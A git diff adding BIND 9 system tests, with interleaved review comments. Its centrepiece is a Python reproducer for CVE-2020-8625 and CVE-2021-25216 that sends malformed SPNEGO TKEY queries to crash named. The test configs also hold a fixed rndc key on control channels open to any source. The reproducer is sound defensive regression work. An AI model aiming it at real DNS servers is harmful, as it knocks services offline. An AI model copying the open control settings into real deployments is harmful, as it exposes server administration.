+if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +[ $status -eq 0 ] && echo_i "tsiggss tests all OK" + +kill `cat authsock.pid` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py b/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py new file mode 100755 index 0000000..6340b5a --- /dev/null +++ b/bin/tests/system/tsiggss/tests_isc_spnego_flaws.py 
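Review bot: The expected-denial cases in tsiggss/tests.sh ("denied as administrator", "denied (A) as a user", and the two "external update policy" refusals) pass on any non-zero return from `test_update`, so an unusable credential cache, a failed TKEY negotiation or an unreachable server is indistinguishable from a policy refusal and the access-control decision is not really exercised. Before `n` is incremented in each of those cases, also assert the reason, for example `grep "update failed: REFUSED" nsupdate.out${n} > /dev/null || ret=1` (exact string to be confirmed against nsupdate's output for this build). Separately, the last test sets `status=1` inside `[ $ret = 0 ] || { ... }` and then adds `ret` to `status` again, and the SIG(0) test prints "failed" twice.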
@@ -0,0 +1,219 @@ +#!/usr/bin/python +############################################################################ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. +############################################################################ + +""" +A tool for reproducing ISC SPNEGO vulnerabilities +""" + +import argparse +import datetime +import struct +import time + +import pytest + +pytest.importorskip("dns") +import dns.message +import dns.name +import dns.query +import dns.rdata +import dns.rdataclass +import dns.rdatatype +import dns.rrset + + +class CraftedTKEYQuery: + # pylint: disable=too-few-public-methods + + """ + A class for preparing crafted TKEY queries + """ + + def __init__(self, opts: argparse.Namespace) -> None: + # Prepare crafted key data + tkey_data = ASN1Encoder(opts).get_tkey_data() + # Prepare TKEY RDATA containing crafted key data + rdata = dns.rdata.GenericRdata( + dns.rdataclass.ANY, dns.rdatatype.TKEY, self._get_tkey_rdata(tkey_data) + ) + # Prepare TKEY RRset with crafted RDATA (for the ADDITIONAL section) + rrset = dns.rrset.from_rdata(dns.name.root, dns.rdatatype.TKEY, rdata) + + # Prepare complete TKEY query to send + self.msg = dns.message.make_query( + dns.name.root, dns.rdatatype.TKEY, dns.rdataclass.ANY + ) + self.msg.additional.append(rrset) + + def _get_tkey_rdata(self, tkey_data: bytes) -> bytes: + """ + Return the RDATA to be used for the TKEY RRset sent in the ADDITIONAL + section + """ + tkey_rdata = dns.name.from_text("gss-tsig.").to_wire() # domain + if not tkey_rdata: + return b"" + tkey_rdata += struct.pack(">I", int(time.time()) - 3600) # inception + 
tkey_rdata += struct.pack(">I", int(time.time()) + 86400) # expiration + tkey_rdata += struct.pack(">H", 3) # mode + tkey_rdata += struct.pack(">H", 0) # error + tkey_rdata += self._with_len(tkey_data) # key + tkey_rdata += struct.pack(">H", 0) # other size + return tkey_rdata + + def _with_len(self, data: bytes) -> bytes: + """ + Return 'data' with its length prepended as a 16-bit big-endian integer + """ + return struct.pack(">H", len(data)) + data + + +class ASN1Encoder: + # pylint: disable=too-few-public-methods + + """ + A custom ASN1 encoder which allows preparing malformed GSSAPI tokens + """ + + SPNEGO_OID = b"\x06\x06\x2b\x06\x01\x05\x05\x02" + + def __init__(self, opts: argparse.Namespace) -> None: + self._real_oid_length = opts.real_oid_length + self._extra_oid_length = opts.extra_oid_length + + # The TKEY RR being sent contains an encoded negTokenInit SPNEGO message. + # RFC 4178 section 4.2 specifies how such a message is constructed. + + def get_tkey_data(self) -> bytes: + """ + Return the key data field of the TKEY RR to be sent + """ + return self._asn1( + data_id=b"\x60", data=self.SPNEGO_OID + self._get_negtokeninit() + ) + + def _get_negtokeninit(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of the negTokenInit message to send + """ + return self._asn1( + data_id=b"\xa0", + data=self._asn1( + data_id=b"\x30", + data=self._get_mechtypelist(), + extra_length=self._extra_oid_length, + ), + extra_length=self._extra_oid_length, + ) + + def _get_mechtypelist(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of the MechTypeList to send + """ + return self._asn1( + data_id=b"\xa0", + data=self._asn1( + data_id=b"\x30", + data=self._get_mechtype(), + extra_length=self._extra_oid_length, + ), + extra_length=self._extra_oid_length, + ) + + def _get_mechtype(self) -> bytes: + """ + Return the ASN.1 DER-encoded form of a bogus security mechanism OID + which consists of 'self._real_oid_length' 0x01 bytes + """ + return self._asn1( + 
data_id=b"\x06", + data=b"\x01" * self._real_oid_length, + extra_length=self._extra_oid_length, + ) + + def _asn1(self, data_id: bytes, data: bytes, extra_length: int = 0) -> bytes: + """ + Return the ASN.1 DER-encoded form of 'data' to be included in GSSAPI + key data, designated with 'data_id' as the content identifier. Setting + 'extra_length' to a positive integer allows data length indicated in + the ASN.1 DER representation of 'data' to be increased beyond its + actual size. + """ + data_len = struct.pack(">I", len(data) + extra_length) + return data_id + b"\x84" + data_len + data + + +def parse_options() -> argparse.Namespace: + """ + Parse command line options + """ + parser = argparse.ArgumentParser() + parser.add_argument("--server-ip", required=True) + parser.add_argument("--server-port", type=int, default=53) + parser.add_argument("--real-oid-length", type=int, default=1) + parser.add_argument("--extra-oid-length", type=int, default=0) + + return parser.parse_args() + + +def send_crafted_tkey_query(opts: argparse.Namespace) -> None: + """ + Script entry point + """ + + query = CraftedTKEYQuery(opts).msg + print("# > " + str(datetime.datetime.now())) + print(query.to_text()) + print() + + response = dns.query.tcp(query, opts.server_ip, timeout=2, port=opts.server_port) + print("# < " + str(datetime.datetime.now())) + print(response.to_text()) + print() + + +def test_cve_2020_8625(named_port): + """ + Reproducer for CVE-2020-8625. When run for an affected BIND 9 version, + send_crafted_tkey_query() will raise a network-related exception due to + named (ns1) becoming unavailable after crashing. + """ + for i in range(0, 50): + opts = argparse.Namespace( + server_ip="10.53.0.1", + server_port=named_port, + real_oid_length=i, + extra_oid_length=0, + ) + send_crafted_tkey_query(opts) + + +def test_cve_2021_25216(named_port): + """ + Reproducer for CVE-2021-25216. 
When run for an affected BIND 9 version, + send_crafted_tkey_query() will raise a network-related exception due to + named (ns1) becoming unavailable after crashing. + """ + opts = argparse.Namespace( + server_ip="10.53.0.1", + server_port=named_port, + real_oid_length=1, + extra_oid_length=1073741824, + ) + send_crafted_tkey_query(opts) + + +if __name__ == "__main__": + cli_opts = parse_options() + send_crafted_tkey_query(cli_opts) diff --git a/bin/tests/system/ttl/clean.sh b/bin/tests/system/ttl/clean.sh new file mode 100644 index 0000000..3bb41d9 --- /dev/null +++ b/bin/tests/system/ttl/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./*/named.run +rm -f ./ns*/managed-keys.bind* diff --git a/bin/tests/system/ttl/ns1/max-example.db b/bin/tests/system/ttl/ns1/max-example.db new file mode 100644 index 0000000..aeaafc7 --- /dev/null +++ b/bin/tests/system/ttl/ns1/max-example.db 
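Review bot: Neither `test_cve_2020_8625` nor `test_cve_2021_25216` contains an assertion; both rely on `dns.query.tcp()` raising once named is already gone, so, unless the harness checks for it elsewhere, a server that dies only after answering the last crafted query would still let the test pass. Finish each test with an ordinary query and an explicit check, e.g. `probe = dns.message.make_query("example.nil.", "SOA")` followed by `assert dns.query.tcp(probe, "10.53.0.1", timeout=2, port=named_port).rcode() == dns.rcode.NOERROR` (this needs `import dns.rcode`). The docstring of `send_crafted_tkey_query` still reads "Script entry point" although the pytest functions call it directly; something like `"""Send one crafted TKEY query over TCP and print the query and the response."""` would describe it better.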
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+max-example. 1209600 IN SOA ns root (
+ 2000082401 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 1209600 ; minimum (2 weeks)
+ )
+max-example. 1209600 IN NS ns.max-example.
+ns.max-example. 1209600 IN A 10.53.0.1
diff --git a/bin/tests/system/ttl/ns1/min-example.db b/bin/tests/system/ttl/ns1/min-example.db
new file mode 100644
index 0000000..87d6e7e
--- /dev/null
+++ b/bin/tests/system/ttl/ns1/min-example.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+min-example. 0 IN SOA ns root (
+ 2000082401 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 0 ; minimum (0 seconds)
+ )
+min-example. 0 IN NS ns.min-example.
+ns.min-example. 0 IN A 10.53.0.1
diff --git a/bin/tests/system/ttl/ns1/named.conf.in b/bin/tests/system/ttl/ns1/named.conf.in
new file mode 100644
index 0000000..4c771c9
--- /dev/null
+++ b/bin/tests/system/ttl/ns1/named.conf.in
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ check-integrity no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "min-example" {
+ type primary;
+ file "min-example.db";
+};
+
+zone "max-example" {
+ type primary;
+ file "max-example.db";
+};
diff --git a/bin/tests/system/ttl/ns2/hints.db b/bin/tests/system/ttl/ns2/hints.db
new file mode 100644
index 0000000..c9264bf
--- /dev/null
+++ b/bin/tests/system/ttl/ns2/hints.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 60 IN NS ns.nil.
+ns.nil. 60 IN A 10.53.0.1
diff --git a/bin/tests/system/ttl/ns2/named.conf.in b/bin/tests/system/ttl/ns2/named.conf.in
new file mode 100644
index 0000000..d1c56ac
--- /dev/null
+++ b/bin/tests/system/ttl/ns2/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ servfail-ttl 0;
+ max-recursion-depth 12;
+ recursion yes;
+ dnssec-validation no;
+ min-cache-ttl 60;
+ min-ncache-ttl 30;
+ max-cache-ttl 120;
+ max-ncache-ttl 60;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints.db"; };
diff --git a/bin/tests/system/ttl/prereq.sh b/bin/tests/system/ttl/prereq.sh
new file mode 100644
index 0000000..aa97ae2
--- /dev/null
+++ b/bin/tests/system/ttl/prereq.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
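Review bot: The `controls` statement in ns2/named.conf.in binds the rndc channel to 10.53.0.3, while every other address in this file (`query-source`, `notify-source`, `transfer-source`, `listen-on`) is 10.53.0.2, and ns1's config in this same commit uses its own address for `controls`. This looks like a copy-paste slip; if the test harness addresses rndc commands for ns2 to 10.53.0.2, they would not reach this instance. I would change the line to `inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };`. Because the channel accepts any source and the key is a fixed value committed in the file, a short comment such as `/* test fixture only: static rndc key, control channel open to any source */` would stop the block being copied into a real deployment.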
diff --git a/bin/tests/system/ttl/setup.sh b/bin/tests/system/ttl/setup.sh
new file mode 100644
index 0000000..87c524f
--- /dev/null
+++ b/bin/tests/system/ttl/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
diff --git a/bin/tests/system/ttl/tests_cache_ttl.py b/bin/tests/system/ttl/tests_cache_ttl.py
new file mode 100644
index 0000000..9025283
--- /dev/null
+++ b/bin/tests/system/ttl/tests_cache_ttl.py
@@ -0,0 +1,32 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import pytest
+
+pytest.importorskip("dns")
+import dns.message
+import dns.query
+
+
+@pytest.mark.parametrize(
+ "qname,rdtype,expected_ttl",
+ [
+ ("min-example.", "SOA", 60),
+ ("min-example.", "MX", 30),
+ ("max-example.", "SOA", 120),
+ ("max-example.", "MX", 60),
+ ],
+)
+def test_cache_ttl(qname, rdtype, expected_ttl, named_port):
+ msg = dns.message.make_query(qname, rdtype)
+ response = dns.query.udp(msg, "10.53.0.2", timeout=10, port=named_port)
+ for rr in response.answer + response.authority:
+ assert rr.ttl == expected_ttl
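Review bot: `test_cache_ttl` passes vacuously when the resolver returns no records, because its only assertion sits inside the loop over `response.answer + response.authority`. A SERVFAIL or otherwise empty reply from 10.53.0.2 would leave both sections empty, so the `min-cache-ttl`, `max-cache-ttl` and ncache clamps configured for ns2 would go unchecked while the test still reports success. Bind the combined list first and assert it is non-empty before iterating: `rrsets = response.answer + response.authority`, `assert rrsets, "no records returned"`, then `for rr in rrsets:`. Checking the response code as well would make failures easier to diagnose, but that needs `dns.rcode`, which this file does not import. The function also has no docstring; one sentence saying that each case checks the TTL the caching server hands out against the configured clamp would help.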
diff --git a/bin/tests/system/unknown/clean.sh b/bin/tests/system/unknown/clean.sh
new file mode 100644
index 0000000..1d73edd
--- /dev/null
+++ b/bin/tests/system/unknown/clean.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out* check.out
+rm -f */named.memstats
+rm -f */named.conf
+rm -f */named.run
+rm -f */*.bk
+rm -f */*.bk.*
+rm -f ns3/Kexample.*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/unknown/large.out b/bin/tests/system/unknown/large.out
new file mode 100644
index 0000000..812bde5
--- /dev/null
+++ b/bin/tests/system/unknown/large.out
@@ -0,0 +1 @@ +\# 48000 45841674994E4F5E4BA43AADA754D631DFB7E12155E7F10C551032B3 E56ED5BA5136C15CDA201E7E5E54FB60A99388B61A565C1CF74CD8AA E1AEE7FBEB54CEBEE065CF2B1B317F67277AE733183C668BA81A7EFE C322D36FB5CC6293AD7F7AE3544A7C64D404C4EEB1B889E9780A213B D548A018BE2E1B6A3B8840D714DDB8C0A66BEAA4C2A1471D216AD0EB 8D2C884960D30FD3FAD058C47EACE42AAB0F0D40A690CA3BAF9616B7 373B889788E891757AE0EEACCD291D87D05DAED8631D1EBF9202F816 59754CA11221E902A69C7BF0039310EDF5305ACE5404DDD02163BE0A 22334879A27BFA7702E13D06F15887261A12ABFD0C01966FA67F97ED 38C521DBCFF8A2AA8DAF53F1EAA7991B6767DA0E68B2EBB38BEB8F1A ADAA30C1185870DAD0091E7AF0BBED453CE081BA5DC87CA5A764592E D7312C6A26F7E358EF35182A49763A61C9A0C5DBDDCF199251381215 51EB3C3CED9F529F03A85429F42F75503EFA6E1301AA7AD9B29C5AAA A1EF6EE5BBE9E2639D65BAF98A6B06243483A2453969F65F9A0DAD3D 8630522079B8C1079E28057D63696739B71F57EE85AB20A596865D77 EF70412C7A4BE7D9D5A4EB13709F0EC1AF6A4CF962364761EBD62EFB 4F16EE843C1B214944EFF2C81563C4AC4C854C32972DF761F17FDCAC 3E40E02757FDF1FA57F77E1C86C3D488B02D4634501801BE4F929FFD E0ED07112093D9018D59CEE1733BFDC8A968A831D42B95C087A578E3 C6EEFACFA1C9089072AB490D631B2D00CB75CB33586917F103842856 CA2F5CCD449465B4A86A37F8147D626969F02DAFACD4BA81B680E5DC 288037ADA3BE902E2EF9C129710200AC93F5D3BF1C1418B65D98BDF1 01D38D9B2C5F25A3D09A4638DCC2C0D0CF411F3ED747E6745AC7A8BE 03EA2EE990979CF3B8398C4BFB058012DE25FBF0E1081C4205AFC54D 3BDA63565BC0BC3F6AF91F083ABC26AC7047E2759F28525498AE6461 A1F66B900FDE5D8CD6C842C587F28620444AD5BD3B522F0294C14E22 79B5C577F3F41C15A723A20259805AA18360F6B954B75D98BEECD0C0 A0AD151B0027CCA891932ADFCA9B7ECA33FD585031C188F8D851E3BB C8552F340E1319553BFE776975BAEE6ACF025B8C4849C0A430049734 114B75345228D19846B39580F1C328068A4B36C43EF13380BE7E5406 0ACD9494EE99908F57E779A4C20728135D509B52D5066CC7BAC77F1C 4FCF81E9F0C7CF621593E90F398C56B14FDDC74F62A4854655CB27B1 DC94A83F9A4A52055EA74EA3129F88CB8D01870BFD5157CB966CFA41 21E018C2DD72F363DFA5011D1072FD9350DDE79BEC213520CD68CCEA 
356EE24B2C3E84871540C410353E9514188A46771B07B2B0E261287D 353A8D55A71077B4B509FB99C80D7D07F6739CBC9ED82A5A40E624C0 860A42049585C0ABC164B6E5E726DA58B6FAF8384E0C8E9A03BAE074 415335BAC4E72AAD561CB77A8D7AAD25C67F3D74F38B62F43A2012FB E62C0DEF6BE948098DBCBB0F06769663B8E6A7C0D88AC914DBB8BAA7 85F4509B2DECAD57F85516D2AEF23A24202B4123F4CE41E97653B5F3 8E7E092C8EBFDC36A46D204237AE71484F4249740C2ECA7BEACE1699 CCAAC0DAA6AD8C1A0C5AEB59086C2179A235085D0C68942C8FBD67EC 7FCF627049DF4790757F40D7D027FBEAE4A358EDD5867C7F56710460 38E3086D76D3E22F868DBE60C64EB123BBF15358FD7D5B6511CEDECF A701494B143F77F7463D8E3099B811E8AB53092B3EF6E995A655086B CF61EB773900D425132A04530BEFC404F5BC27D98DD2367BB815580F 8BB7CBEF4793680648959A44A6CD216196A4BD61D1CC44326869877E 2BE943C6C7BB95B854117B1A0B00D33083AFE54461024BD791B2724B ED82EDD289F9376C7E0502627E1E3672345DC53F1F25AFB60568CA28 C84B9214D32FB5D805CDD31324640519C3DD0B6519FA93AB15D734FC 0C5ABBFA90C910C90C3F38B0688B584B6285427F760414C9445B415F E433908035081F5CA081AB53CC7C2701F65A18A5E64EBA887BAD3343 2735C1E62AD2B35F0A258892D919835DFA523E2BAC6DDEBDC0C57640 1F21D937711D774153A7EC42125D24D115240FADB90FE0061D9EC041 EF2905E4AA3E81C453572DF0F72A43D070492261DCAD28174F8B1697 9DB03C2F96D9E53CBFEF510A1BB5D6CFBC4F92A9E94C0C018738E2A9 30922603083124284B076FC1F93AFB20878CCF756C8DE07DC6D01C27 3FF2608136A8DCE64BA4287CC19E35B72B40A32B435F3BFBE94A97F0 972AEBB4C54D95F4993EB831307D22647A1EB7C525FD470FB9CA13D3 404CA5ECFF99E87B73C5B88FD4A905220DB8D183C325E7D27A4D70F7 1469ED347AB68A9F7F1A5EA235BCD9F9BBBEF91A9DF227109D715941 F54EA464C9F8A9D0724BD4C9772023B086BD521C516449C780500CB3 3630AE28CF02C19C0958FAEE545B953CA46217B7AD600679ACD85DCF ECCF4012AA9D5A7E1A1B1A43C7D9A91F8766ED3A5EF61A7A0840BEE2 B8EECCD5932CB1438A7AA271CE6906BDC3D9230AB8D0B095BE53869B 37455D0BAC413F518E39767F23FC669AA0742B8B5196FEDD1284C27D 05372F4653618962468AE24A6C575DAEA152D036619ADB965487D063 1B6182A0EBDD5AAC519ABBC1CBE766283788E8FCE8CE91760EDB4CDA C1636DE694364FED377B9DD5512BB258FF28533CA454EE161E69A58F 
7964A88AFAFE768340ED78896D02FCC6D00090728C86C3C21CF4B89E EB975E2A674B64DA5BC5D05F6D647252E7B3394031BC9B4565C466E5 D9B8D9C2DD96A9950AE0D879BFD8C343709968F0D4A885D9C0A4AD22 B08FA3CB093DCD583AFD49966CB842F3E739FC665AE78550914896A2 D8F660726E02B7847AFAF327990A3478362C091F2B0BF7DD8AFD4F93 5141E63C7C4A680BB02BF84BA0E2FBCE5FCACF1CD51C7732E97A358D BFF58DC07AE2CFC5F66EF5A8532F31BFCFA86886751ECFE4D3234C3E C84EABCB9DE56BD72847E894AC95103FEB7DE2C89780E7377ED61A1B D813F64957419BD798632AA7B5A43D5E90463FE5DB8373A91487E71A B990C0B68C4F86305A3CB78216C98188D9C4FF715D7CC72BD4B64253 B4A894B2B9A3F7AA6C41A1ED2A7CC3553C3716C6D3CA42E4746A1801 93FF49E0B8063412EF9DF6217C97D30FB7ECC5ABACF22E08105B0B09 807B3F3CDF66A695F46F5ACE7FFF41208859CA38610F6A91368685C9 EF8E68958ACAB3C7F198A484ACD6592CDD0F1507AF662A61E9FE8EB4 0EFEEBED64888802978952DD21C9D903B2BE0845C3611A138C2750B1 35D0D55FAE5AE23A8274DA034E28D2B7760F82AB2F83AB1CD34D9C45 F7FB63527845704A4E68CF578C8604F269F70DB8F4462980EEAAA40A C20076FDDDFA2F2F31AE7E031388ED6BCBF0DA39FD210351C956151C 5A69B8DB3ECBA80B6DA822A858E8D5ABC24D3AFBADE4B8FAC50CD36F 3926AF3CC6917D2A54A83540BBC96ECADBCDBA189849B07B865538B3 B4FE142D2DFC0DEC688DA44B3C0B8C4605A00CC826BD5826A8E43F22 5E75D246DE2C896394AC9169746689010F2E958029F874A084813663 BF14A38111685457842BE8566C634FE7BD34A0846B82929DC357F06B A186A3A6917521881A1B84473B9D6BE8C10DDA27655BCEF81AC6E717 CCA29E9E0F6A02578B7A6F97CEC7B600785C4ACE6EAFE9F7F604F754 0538F96501467456BF132D1F52555DE292C21E3AA5FC24CD57E2A65E 742E2FEC311F3CBD19B9B4F8E9C5A66191F4C19B8F641D9C7FA58338 F179B533DCBF6A88849E4BD01B094B5B8B09BBF3095F683029DFA61A 4C91A582DF0380AA4A0ABC97A7BA9735BC7C2894AE6883B42CDCA772 626C31088C1684F64DEA810199C2D48A5467DB001BA4E274C0F7A5E7 62CC615A91FE537B356C7D76D24D310EF4D6D1E19F1788FED740686E 9BCE08E6B06B99A3BB7100477563992420FC70BB75B783820DF34C3F 7595E7EFC3E225EA5F2B33C05F515E1D3B4DA67B0DD461E1A82260B6 D2B7A0A43265A8003A5FD13F57CF05878211C6E1EB8C635A2C8D1533 F0260FAD1DF4FA41CE398E0974A5EA54AEBECF6E9AE57562BAA826C9 
831C56CAB61565E2697E96F563D55B75B48A4FB6F32C02EBC2BFEC9F D519C396FFF42F1C4953DCD2EDE87F62EA90CDB1ACBAC2B187EF7104 7DE4477514612593FD7F849E4190A59BC147EA07B794E0880EA37F5F 27AA5FA78905F6495668253890699E319F14D54996E36E1F6DDED0C9 552605AD9D20F8F4E6DD26FDB7FC681415F15D47E4997995A671F85F 56E54A146D1E16C7909B0EFD42CAFB92F12B9F4F88157A68CCF8DCF3 295AE65D26DD53233CD414F73881A5FED934C577B7C66F484965E1EA 507F2FDB20141A9C6458F22265E26CE6AC906B4BD43F178331328BEA 55C61E737F2F130E51F0ED343A9E9709036ABE6338446B8CA7B9CD83 1F4C63908FCB6EB134626F89DF0A134F9F7CD196BC96A5DDD2B2CC55 30220D4708D5D2FC55EB64ECC1B668970E7DF11FAEB3782630A37920 89E2A0443631AEC02CF8078C8CACB3BBFFF7304670B391690AE1A29B 445A46CF78B84D26E830B8D072C2F0A2292CF29AE11F509855C1972D 5F86A13773FE91954B2EB5C8E75B9554C082FE65EA01D0D6794D621B 231DB56DD59EEEBE4D71144B966C19B402DBAA25D051F9DCAB7F0631 42D35123D9CA28A89A4CF3E771095F794F6A7D495870AC9F47D1E024 B5341C931590225B76931999C9D341D8CDEA4D0443D719E09ED22758 4243480B618246A318ADDF475A70F3BE57C3278E23D48874E2682486 4ABE829CA2318DDEC436D182040F014D4FBCB1FBDBF2AB82B613B7DD B45DC7635796A6AB203F8D9A6A04C08B40BE8452B4058EB6199FF68C A8A570F1A179ED662E4FBC1DDB8364CCABDB7D25EB9BFA6844D4D379 FFF7161F13D287AF0B6B9EF3D2C164BC63D412F04CC3DDBEDA6D9738 38B329108388EF700E42E232009782D380127200412E27671DF2B17D 5D7FA517CE12C66D6B84B11365611CB11E0BF27B06F3B86C4B4572E6 3702DAD0A3F9784656D16F7B731951FAEFD190B4F7E0322871A2733C 30670C311DB6F8C24E51C747525D04E551DFE1EC6A20E796D0B7F4BE 73896895FD6BF922B02BDC0C1412317AC0975D0CBC8C5A01F17F842C 9CDEF7CDB02055425BB1EE0FBE46BAB2FB6C3D3E3D86EB066EDD23B5 7F18C3B9FEC9C6C3D8D41B77DADA06F08890490354F95E97FECEE7F6 BDE50325F659971D8940C6B299531EC9E07413CDB92EA26DB7AE21A1 51CD59BFE72B8A19998384EE8985CC47544EDC79F5F266F0887664DB 09136792E75DFBC306DB725E5D1089DE94E3305A3DB61B799A22EBEA 3A72C52A9EAA89A2983F47FD0C685445D30C6023C855613F33E023E1 A73120762816B70CA46FE2BF0C14B9706DA2F993FE00053AC6828033 7B92FE344695DA64CAE061541164BCADAEFAECEE529AEF20F0530104 
